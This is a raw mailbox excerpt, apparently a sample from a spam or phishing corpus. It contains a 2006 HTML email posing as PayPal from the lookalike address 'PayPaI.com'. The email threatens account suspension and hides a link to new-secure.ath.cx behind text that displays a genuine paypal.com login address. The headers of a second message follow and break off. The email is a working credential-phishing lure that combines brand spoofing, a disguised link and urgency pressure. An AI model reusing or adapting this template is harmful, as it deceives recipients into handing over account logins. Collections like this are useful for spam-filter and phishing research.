From: Service@PayPaI.com<Service@PayPaI.com>
Content-Type: text/html
Message-Id: <E1G1Nzf-0004je-Mc@mana.nocfast.net>
Sender: Nobody <nobody@mana.nocfast.net>
Date: Fri, 14 Jul 2006 06:45:48 -0700
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - mana.nocfast.net
X-AntiAbuse: Original Domain - example.com
X-AntiAbuse: Originator/Caller UID/GID - [99 99] / [47 12]
X-AntiAbuse: Sender Address Domain - mana.nocfast.net
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: 
X-Status: 
X-Keywords:                   


<img src="http://www.paypalobjects.com/en_US/i/header/header_girlBike_589x133.jpg" nosend="1" border="0">
		<p><font face="Verdana" size="2">Dear valued <strong>PayPal</strong> 
		member</font>: <br>

		<br>
		&nbsp;</p>
		<p><font face="Verdana" size="2">Identity protection matters. And
		<strong>PayPal</strong> works day and night to help keep your identity 
		safe. That's why it has come to our attention that your <strong>PayPal</strong> 
		account information needs to be updated as part of our continuing 
		commitment to protect your account and to reduce the instance of fraud 
		on our website. If you could take 5-10 minutes out of your online 
		experience and update your personal records you will not run into any 
		future problems with the online service.<br>
		&nbsp;</font></p>
		<p><font face="Verdana" size="2">However, failure to update your records 
		will result in account suspension.<br>

		&nbsp;</font></p>
		<p><font face="Verdana" size="2">Once you have updated your account 
		records, your <strong>PayPal</strong> session will not be interrupted 
		and will continue as normal.</font></p>
		<p><font face="Verdana" size="2">To login to your <strong>PayPal</strong> 
		account and update your records click on the following link:<br>
		&nbsp;</font></p>
		<a target="_top" href="http://new-secure.ath.cx/www.paypal.com/">

		<font color="#0000ff" face="Verdana" size="2">
		https://www.paypal.com/cgi-bin/webscr?cmd=_login-run</font></a><br>
		&nbsp;
		<p><font face="Verdana" size="2">Thank You for using PayPal!<br>
		&nbsp;</font></p>
		<p><font face="Verdana" size="2">The <strong>PayPal</strong> Team</font></p>

		<table border="0" width="100%">
			<tbody><tr>
				<td width="57%">
				<img src="http://www.paypal.com/en_US/i/logo/paypal_logo.gif" nosend="1" border="0"></td>
				<td width="43%">
				<img src="https://www.paypalobjects.com/en_US/i/email/email_ts_120x80.gif" nosend="1" height="80" width="120"></td>
			</tr>
		</tbody></table>
		<font face="Verdana" size="2">

		</font><p>
<font face="Verdana" size="2">		-----------------------------------------------------------------------------------</font></p>
<font face="Verdana" size="2">		</font><p><font face="Verdana" size="2">Accounts Management will periodically send you information about site 
		changes and enhancements, as outlined in our User Agreement.</font></p>
<font face="Verdana" size="2">		</font><p>
<font face="Verdana" size="2">		-----------------------------------------------------------------------------------</font></p>
<font face="Verdana" size="2">		</font><p><font face="Verdana" size="2">Please do not reply to this email. This mailbox is not monitored and 
		you will not receive a response. For assistance, log in to your PayPal 
		account and click the Help link located in the top right corner of any 
		PayPal page.</font></p>
<font face="Verdana" size="2">		</font><p>

<font face="Verdana" size="2">		-----------------------------------------------------------------------------------</font></p>
<font face="Verdana" size="2">		</font><p><font face="Verdana" size="2">PayPal Limited is authorised and regulated by the Financial Services 
		Authority in the United States as an electronic money institution.</font></p>
<font face="Verdana" size="2">		</font><p><font face="Verdana" size="2">PayPal Email ID PP359</font>

From oscar@landsat.org  Fri Jul 14 10:39:29 2006
Return-Path: <oscar@landsat.org>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by funky.example.com (Postfix) with ESMTP id 8B6B94696A
	for <nobody@login.example.com>; Fri, 14 Jul 2006 10:39:29 -0400 (EDT)
Received: from lujan.example.com (foo.example.com [10.2.3.4])
	by mail1.example.com (Postfix) with ESMTP id 0F3286CCF89
	for <nobody@example.com>; Fri, 14 Jul 2006 10:39:32 -0400 (EDT)
Received: by lujan.example.com (Postfix)
	id 3644B1BE39; Fri, 14 Jul 2006 16:39:29 +0200 (CEST)
Delivered-To: foobee@example.com
Received: from mar.example.com (mar.example.com [193.146.180.108])
	by lujan.example.com (Postfix) with ESMTP id E97991BDBA
	for <foobee@example.com>; Fri, 14 Jul 2006 16:39:28 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mar.example.com (Postfix) with ESMTP id D68335C7
	for <foobee@example.com>; Fri, 14 Jul 2006 16:39:28 +0200 (CEST)
Received: from lujan.example.com ([10.2.3.4])
	by localhost (mar [193.146.180.108]) (amavisd-new, port 10024)
	with ESMTP id 10670-02 for <foobee@example.com>;
	Fri, 14 Jul 2006 16:39:19 +0200 (CEST)
Received: from landsat.org (canao.geo.msu.edu [35.8.163.100])
	by lujan.example.com (Postfix) with ESMTP id 777A81BDAD
	for <foobee@example.com>; Fri, 14 Jul 2006 16:39:17 +0200 (CEST)
Received: by landsat.org (Postfix, from userid 501)
	id 502934EB1D; Fri, 14 Jul 2006 19:41:10 -0400 (EDT)
To: foobee@example.com
